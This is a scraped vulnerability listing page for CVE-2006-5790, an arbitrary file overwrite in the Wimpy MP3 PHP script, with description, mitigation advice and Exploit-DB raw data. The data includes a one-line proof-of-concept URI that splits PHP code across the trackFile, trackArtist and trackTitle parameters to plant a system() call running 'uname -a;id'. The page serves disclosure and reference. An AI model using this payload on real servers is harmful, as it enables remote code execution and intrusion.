Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Arbitrary File Overwrite in Wimpy MP3 - exploit.company
header-logo
Suggest Exploit
vendor:
Wimpy MP3
by:
Unknown
6.5
CVSS
MEDIUM
Arbitrary File Overwrite
22
CWE
Product Name: Wimpy MP3
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: CVE-2006-5790
CPE: a:wimpy:mp3
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2006

Arbitrary File Overwrite in Wimpy MP3

The Wimpy MP3 application is vulnerable to an arbitrary file overwrite weakness. An attacker can exploit this vulnerability by providing malicious data through the 'trackFile' parameter in the 'wimpy_trackplays.php' script. This can lead to the overwrite of a text file with attacker-supplied content. Successful exploitation of this vulnerability can assist an attacker in further attacks.

Mitigation:

It is recommended to update to a patched version of the Wimpy MP3 application. Additionally, input validation should be implemented to prevent the execution of arbitrary commands or overwriting of files.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16696/info

Wimpy MP3 is prone to a weakness that permits the overwriting of a text file with arbitrary attacker-supplied data.

Successful exploitation of this issue may aid an attacker in further attacks.

The following proof of concept URI is available:
http://www.example.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>

Navigation

Suggest Exploit

Services By CQR